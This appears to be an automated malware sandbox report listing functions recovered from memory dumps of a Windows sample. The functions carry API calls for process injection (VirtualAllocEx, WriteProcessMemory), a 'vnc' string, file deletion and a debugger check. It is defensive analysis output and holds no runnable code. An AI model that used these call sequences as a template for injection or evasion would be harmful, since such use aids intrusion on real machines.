Function 00FDDEBB, Relevance: 10.6, APIs: 3, Strings: 2, Instructions: 27

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 00FDDEC9
GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00FDDED5
SetLastError.KERNEL32(00000001,00FE42C8,01002954,?,01002DB4,00000000,00000006,?,00FEBBC2,01002DB4,?,?,00000000), ref: 00FDDEED

Strings

shell32.dll, xrefs: 00FDDEC8
SHGetKnownFolderPath, xrefs: 00FDDED3

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3DEBB, Relevance: 10.6, APIs: 3, Strings: 2, Instructions: 27

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 00C3DEC9
GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00C3DED5
SetLastError.KERNEL32(00000001,00C442C8,00C62954,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C3DEED

Strings

shell32.dll, xrefs: 00C3DEC8
SHGetKnownFolderPath, xrefs: 00C3DED3

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD79B9, Relevance: 10.6, APIs: 7, Instructions: 126

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00FD79F0
WSASetLastError.WS2_32(00000008), ref: 00FD79FF
memcpy.MSVCRT ref: 00FD7A1C
memcpy.MSVCRT ref: 00FD7A2E
WSASetLastError.WS2_32(00000008,?,?,?), ref: 00FD7A98
WSAGetLastError.WS2_32(?,?,?), ref: 00FD7AB4

Part of subcall function 00FD7CDE: InterlockedIncrement.KERNEL32(?,?,00000000), ref: 00FD7D2F
Part of subcall function 00FD7CDE: RegisterWaitForSingleObject.KERNEL32(?,?,00FD7B1D,?,000000FF,00000004), ref: 00FD7D43

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?), ref: 00FD7ADD

Part of subcall function 00FCF9C5: memcpy.MSVCRT ref: 00FCF9DA
Part of subcall function 00FCF9C5: SetEvent.KERNEL32 ref: 00FCF9EA

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C379B9, Relevance: 10.6, APIs: 7, Instructions: 126

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C379F0
WSASetLastError.WS2_32(00000008), ref: 00C379FF
memcpy.MSVCRT ref: 00C37A1C
memcpy.MSVCRT ref: 00C37A2E
WSASetLastError.WS2_32(00000008,?,?,?), ref: 00C37A98
WSAGetLastError.WS2_32(?,?,?), ref: 00C37AB4

Part of subcall function 00C37CDE: InterlockedIncrement.KERNEL32(?,?,00000000), ref: 00C37D2F
Part of subcall function 00C37CDE: RegisterWaitForSingleObject.KERNEL32(?,?,00C37B1D,?,000000FF,00000004), ref: 00C37D43

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?), ref: 00C37ADD

Part of subcall function 00C2F9C5: memcpy.MSVCRT ref: 00C2F9DA
Part of subcall function 00C2F9C5: SetEvent.KERNEL32 ref: 00C2F9EA

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD5208, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60

APIs

memset.MSVCRT ref: 00FD5229
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 00FD5261
memcpy.MSVCRT ref: 00FD527C
CloseHandle.KERNEL32(?), ref: 00FD5291
CloseHandle.KERNEL32(?), ref: 00FD5297

Strings

D, xrefs: 00FD5232

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD9895, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49

APIs

CloseHandle.KERNEL32 ref: 00FD989F
GetSystemTimeAsFileTime.KERNEL32(?), ref: 00FD98AD

Part of subcall function 00FCE6AF: GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 00FCE6BC
Part of subcall function 00FCE6AF: CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 00FCE6DC

memcpy.MSVCRT ref: 00FD98E8
lstrcpyW.KERNEL32(?,?), ref: 00FD98FD

Part of subcall function 00FEB9D8: PathIsDirectoryW.SHLWAPI(?), ref: 00FEBA0E
Part of subcall function 00FEB9D8: CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 00FEBA30
Part of subcall function 00FEB9D8: GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 00FEBA76
Part of subcall function 00FEB9D8: CloseHandle.KERNEL32 ref: 00FEBA95
Part of subcall function 00FEB9D8: PathRemoveFileSpecW.SHLWAPI ref: 00FEBAA2

CloseHandle.KERNEL32 ref: 00FD9916

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00FD98B3

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FCA5B2, Relevance: 10.5, APIs: 4, Strings: 1, Instructions: 293

APIs

Part of subcall function 00FEBEE3: CreateMutexW.KERNEL32(01002974,00000000,?), ref: 00FEBF05

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

Part of subcall function 00FD1B16: CreateFileW.KERNEL32(01111EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FD1B2F
Part of subcall function 00FD1B16: GetFileSizeEx.KERNEL32(?,?), ref: 00FD1B42
Part of subcall function 00FD1B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00FD1B68
Part of subcall function 00FD1B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00FD1B80
Part of subcall function 00FD1B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD1B9E
Part of subcall function 00FD1B16: CloseHandle.KERNEL32 ref: 00FD1BA7

memset.MSVCRT ref: 00FCA757
memcpy.MSVCRT ref: 00FCA780

Part of subcall function 00FED95F: GetSystemTime.KERNEL32(?), ref: 00FED969

Part of subcall function 00FD69C9: HeapAlloc.KERNEL32(00000000,?,?,00FF4E9D,00FC9851,?,?,00FF4FB1,?,?,?,?,?,?,?,?), ref: 00FD69F3
Part of subcall function 00FD69C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00FF4E9D,00FC9851,?,?,00FF4FB1,?,?,?,?,?,?), ref: 00FD6A06

Part of subcall function 00FF3993: memcpy.MSVCRT ref: 00FF3AA4

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00FCA885
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FCA8A1

Part of subcall function 00FCE348: CloseHandle.KERNEL32 ref: 00FCE354

Part of subcall function 00FD2FB7: ReleaseMutex.KERNEL32 ref: 00FD2FBB
Part of subcall function 00FD2FB7: CloseHandle.KERNEL32 ref: 00FD2FC2

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FCA46D: memset.MSVCRT ref: 00FCA47C
Part of subcall function 00FCA46D: memset.MSVCRT ref: 00FCA4BF
Part of subcall function 00FCA46D: memset.MSVCRT ref: 00FCA4F5

Part of subcall function 00FD1149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD1158

Part of subcall function 00FD0C35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00FD0C9B
Part of subcall function 00FD0C35: memcpy.MSVCRT ref: 00FD0CB5
Part of subcall function 00FD0C35: VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00FD0CC8
Part of subcall function 00FD0C35: memset.MSVCRT ref: 00FD0D1F
Part of subcall function 00FD0C35: memcpy.MSVCRT ref: 00FD0D33
Part of subcall function 00FD0C35: VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00FD0E22

Part of subcall function 00FF3B9E: memcmp.MSVCRT ref: 00FF3C47

Part of subcall function 00FD1BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD1BC6
Part of subcall function 00FD1BB5: CloseHandle.KERNEL32 ref: 00FD1BD5

Strings

vnc, xrefs: 00FCA601 00FCA60E

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2A5B2, Relevance: 10.5, APIs: 4, Strings: 1, Instructions: 293

APIs

Part of subcall function 00C4BEE3: CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

Part of subcall function 00C31B16: CreateFileW.KERNEL32(00F41EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C31B2F
Part of subcall function 00C31B16: GetFileSizeEx.KERNEL32(?,?), ref: 00C31B42
Part of subcall function 00C31B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C31B68
Part of subcall function 00C31B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C31B80
Part of subcall function 00C31B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31B9E
Part of subcall function 00C31B16: CloseHandle.KERNEL32 ref: 00C31BA7

memset.MSVCRT ref: 00C2A757
memcpy.MSVCRT ref: 00C2A780

Part of subcall function 00C4D95F: GetSystemTime.KERNEL32(?), ref: 00C4D969

Part of subcall function 00C369C9: HeapAlloc.KERNEL32(00000000,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?,?,?), ref: 00C369F3
Part of subcall function 00C369C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?), ref: 00C36A06

Part of subcall function 00C53993: memcpy.MSVCRT ref: 00C53AA4

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00C2A885
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C2A8A1

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C2A46D: memset.MSVCRT ref: 00C2A47C
Part of subcall function 00C2A46D: memset.MSVCRT ref: 00C2A4BF
Part of subcall function 00C2A46D: memset.MSVCRT ref: 00C2A4F5

Part of subcall function 00C31149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31158

Part of subcall function 00C30C35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C30C9B
Part of subcall function 00C30C35: memcpy.MSVCRT ref: 00C30CB5
Part of subcall function 00C30C35: VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00C30CC8
Part of subcall function 00C30C35: memset.MSVCRT ref: 00C30D1F
Part of subcall function 00C30C35: memcpy.MSVCRT ref: 00C30D33
Part of subcall function 00C30C35: VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00C30E22

Part of subcall function 00C53B9E: memcmp.MSVCRT ref: 00C53C47

Part of subcall function 00C31BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31BC6
Part of subcall function 00C31BB5: CloseHandle.KERNEL32 ref: 00C31BD5

Strings

vnc, xrefs: 00C2A601 00C2A60E

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF5419, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 46

APIs

LoadLibraryW.KERNEL32(urlmon.dll), ref: 00FF5420
GetProcAddress.KERNEL32(?,ObtainUserAgentString), ref: 00FF5436
FreeLibrary.KERNEL32 ref: 00FF5481

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Strings

urlmon.dll, xrefs: 00FF541B
ObtainUserAgentString, xrefs: 00FF542E

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C55419, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 46

APIs

LoadLibraryW.KERNEL32(urlmon.dll), ref: 00C55420
GetProcAddress.KERNEL32(?,ObtainUserAgentString), ref: 00C55436
FreeLibrary.KERNEL32 ref: 00C55481

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Strings

urlmon.dll, xrefs: 00C5541B
ObtainUserAgentString, xrefs: 00C5542E

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDDEFC, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 40

APIs

EnterCriticalSection.KERNEL32(01003510,?,00000000,?,00FE4659,?,00FE49A5,?,?,00000001), ref: 00FDDF10
LeaveCriticalSection.KERNEL32(01003510,?,00000000,?,00FE4659,?,00FE49A5,?,?,00000001), ref: 00FDDF38

Part of subcall function 00FDDEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00FDDEC9
Part of subcall function 00FDDEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00FDDED5
Part of subcall function 00FDDEBB: SetLastError.KERNEL32(00000001,00FE42C8,01002954,?,01002DB4,00000000,00000006,?,00FEBBC2,01002DB4,?,?,00000000), ref: 00FDDEED

IsWow64Process.KERNEL32(000000FF,?), ref: 00FDDF61

Strings

IsWow64Process, xrefs: 00FDDF44
kernel32.dll, xrefs: 00FDDF49

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3DEFC, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 40

APIs

EnterCriticalSection.KERNEL32(00C63510,?,00000000,?,00C44659,?,00C449A5,?,?,00000001), ref: 00C3DF10
LeaveCriticalSection.KERNEL32(00C63510,?,00000000,?,00C44659,?,00C449A5,?,?,00000001), ref: 00C3DF38

Part of subcall function 00C3DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00C3DEC9
Part of subcall function 00C3DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00C3DED5
Part of subcall function 00C3DEBB: SetLastError.KERNEL32(00000001,00C442C8,00C62954,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C3DEED

IsWow64Process.KERNEL32(000000FF,?), ref: 00C3DF61

Strings

IsWow64Process, xrefs: 00C3DF44
kernel32.dll, xrefs: 00C3DF49

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD6997, Relevance: 9.6, APIs: 1, Instructions: 9

APIs

Part of subcall function 00FD692C: EnterCriticalSection.KERNEL32(01003510,00000024,00FD699F,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD693C
Part of subcall function 00FD692C: LeaveCriticalSection.KERNEL32(01003510,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD6966

HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36997, Relevance: 9.6, APIs: 1, Instructions: 9

APIs

Part of subcall function 00C3692C: EnterCriticalSection.KERNEL32(00C63510,00000024,00C3699F,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C3693C
Part of subcall function 00C3692C: LeaveCriticalSection.KERNEL32(00C63510,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C36966

HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C43C8C, Relevance: 9.6, APIs: 5, Instructions: 138

APIs

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

FindFirstFileW.KERNEL32(?,?), ref: 00C43CCB
SetLastError.KERNEL32(?,?,?,?), ref: 00C43DF6

Part of subcall function 00C43E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00C43E98
Part of subcall function 00C43E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00C43EB7

FindNextFileW.KERNEL32(?,?), ref: 00C43DC0
GetLastError.KERNEL32(?,?), ref: 00C43DD9
FindClose.KERNEL32 ref: 00C43DEF

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCDE64, Relevance: 9.5, APIs: 6, Instructions: 88

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00FCE138,?,?,?,?,?,00000009,00000000), ref: 00FCDE7E
LeaveCriticalSection.KERNEL32 ref: 00FCDF65

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

memcpy.MSVCRT ref: 00FCDEEF
memcpy.MSVCRT ref: 00FCDF13
memcpy.MSVCRT ref: 00FCDF2A
memcpy.MSVCRT ref: 00FCDF4A

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2DE64, Relevance: 9.5, APIs: 6, Instructions: 88

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00C2E138,?,?,?,?,?,00000009,00000000), ref: 00C2DE7E
LeaveCriticalSection.KERNEL32 ref: 00C2DF65

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

memcpy.MSVCRT ref: 00C2DEEF
memcpy.MSVCRT ref: 00C2DF13
memcpy.MSVCRT ref: 00C2DF2A
memcpy.MSVCRT ref: 00C2DF4A

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF30A2, Relevance: 9.5, APIs: 5, Instructions: 71

APIs

Part of subcall function 00FF2755: EnterCriticalSection.KERNEL32(01003510,?,00FF30AF,?,?,00000000), ref: 00FF2765
Part of subcall function 00FF2755: LeaveCriticalSection.KERNEL32(01003510,?,00000000), ref: 00FF278F

socket.WS2_32(?,00000002,00000000), ref: 00FF30BC
WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00FF30EF
WSAGetLastError.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00FF30F6

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,?,?,00000000,00000000), ref: 00FF312A

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

closesocket.WS2_32 ref: 00FF313A

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C530A2, Relevance: 9.5, APIs: 5, Instructions: 71

APIs

Part of subcall function 00C52755: EnterCriticalSection.KERNEL32(00C63510,?,00C530AF,?,?,00000000), ref: 00C52765
Part of subcall function 00C52755: LeaveCriticalSection.KERNEL32(00C63510,?,00000000), ref: 00C5278F

socket.WS2_32(?,00000002,00000000), ref: 00C530BC
WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00C530EF
WSAGetLastError.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00C530F6

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,?,?,00000000,00000000), ref: 00C5312A

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

closesocket.WS2_32 ref: 00C5313A

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE44FB, Relevance: 9.5, APIs: 5, Instructions: 59

APIs

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

FindFirstFileW.KERNEL32(?,?), ref: 00FE452C

Part of subcall function 00FCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00FCE82F
Part of subcall function 00FCE826: DeleteFileW.KERNEL32(?), ref: 00FCE836

FindNextFileW.KERNEL32(?,?), ref: 00FE457E
FindClose.KERNEL32 ref: 00FE4589
SetFileAttributesW.KERNEL32(?,00000080), ref: 00FE4595
RemoveDirectoryW.KERNEL32(?), ref: 00FE459C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C444FB, Relevance: 9.5, APIs: 5, Instructions: 59

APIs

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

FindFirstFileW.KERNEL32(?,?), ref: 00C4452C

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

FindNextFileW.KERNEL32(?,?), ref: 00C4457E
FindClose.KERNEL32 ref: 00C44589
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C44595
RemoveDirectoryW.KERNEL32(00000000), ref: 00C4459C

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C44A6B, Relevance: 9.4, APIs: 5, Instructions: 109

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44A89

Part of subcall function 00C44159: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00C44188
Part of subcall function 00C44159: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00C441C7
Part of subcall function 00C44159: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C441EE

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44AC4
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B04
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B27

Part of subcall function 00C445AE: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C445D1
Part of subcall function 00C445AE: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C445E9
Part of subcall function 00C445AE: DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00C44604

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C44B77

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FEB70A, Relevance: 9.4, APIs: 5, Instructions: 89

APIs

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

CreateDirectoryW.KERNEL32(?,00000000), ref: 00FEB783
SetFileAttributesW.KERNEL32(?), ref: 00FEB7A2
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00FEB7B9
GetLastError.KERNEL32(?,00000002,?,?), ref: 00FEB7C6
CloseHandle.KERNEL32 ref: 00FEB7FF

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 035209D8, Relevance: 9.2, APIs: 6, Instructions: 190

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 03520A49
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?), ref: 03520AB7
LCMapStringW.KERNEL32(00000000,?,00000000,?,00000000,00000000), ref: 03520AD3
LCMapStringW.KERNEL32(00000000,?,00000000,?,?), ref: 03520B0C

Part of subcall function 03520D2C: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0351FEF1,?,00000001,?,?,0351EAC5,00000018,0353EF58,0000000C,0351EB55), ref: 03520D71

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 03520B72
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 03520B91

Part of subcall function 0351F662: IsDebuggerPresent.KERNEL32 ref: 0352098D
Part of subcall function 0351F662: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035209A2
Part of subcall function 0351F662: UnhandledExceptionFilter.KERNEL32(0353E630), ref: 035209AD
Part of subcall function 0351F662: GetCurrentProcess.KERNEL32 ref: 035209C9
Part of subcall function 0351F662: TerminateProcess.KERNEL32 ref: 035209D0

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FD5C67, Relevance: 9.1, APIs: 5, Instructions: 49

APIs

EnterCriticalSection.KERNEL32(0111201C,?,?,00000001,00FE4EA8,?,?,00000001), ref: 00FD5C70
LeaveCriticalSection.KERNEL32(0111201C,?,00000001,00FE4EA8,?,?,00000001), ref: 00FD5C7A
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00FD5CA0
EnterCriticalSection.KERNEL32(0111201C,?,00000001,00FE4EA8,?,?,00000001), ref: 00FD5CB8
LeaveCriticalSection.KERNEL32(0111201C,?,00000001,00FE4EA8,?,?,00000001), ref: 00FD5CC2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C35C67, Relevance: 9.1, APIs: 5, Instructions: 49

APIs

EnterCriticalSection.KERNEL32(0000000C,?,?,00000001,00C44EA8,?,?,00000001), ref: 00C35C70
LeaveCriticalSection.KERNEL32(0000000C,?,00000001,00C44EA8,?,?,00000001), ref: 00C35C7A
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00C35CA0
EnterCriticalSection.KERNEL32(0000000C,?,00000001,00C44EA8,?,?,00000001), ref: 00C35CB8
LeaveCriticalSection.KERNEL32(0000000C,?,00000001,00C44EA8,?,?,00000001), ref: 00C35CC2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD49D7, Relevance: 9.1, APIs: 6, Instructions: 145

APIs

memset.MSVCRT ref: 00FD4A18

Part of subcall function 00FF3D5A: memcpy.MSVCRT ref: 00FF3D94

CharLowerW.USER32 ref: 00FD4A5C
CharUpperW.USER32(?,?,00000001), ref: 00FD4A6D
CharLowerW.USER32 ref: 00FD4A81
CharUpperW.USER32(?,00000001), ref: 00FD4A8B
memcmp.MSVCRT ref: 00FD4AA0

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C349D7, Relevance: 9.1, APIs: 6, Instructions: 145

APIs

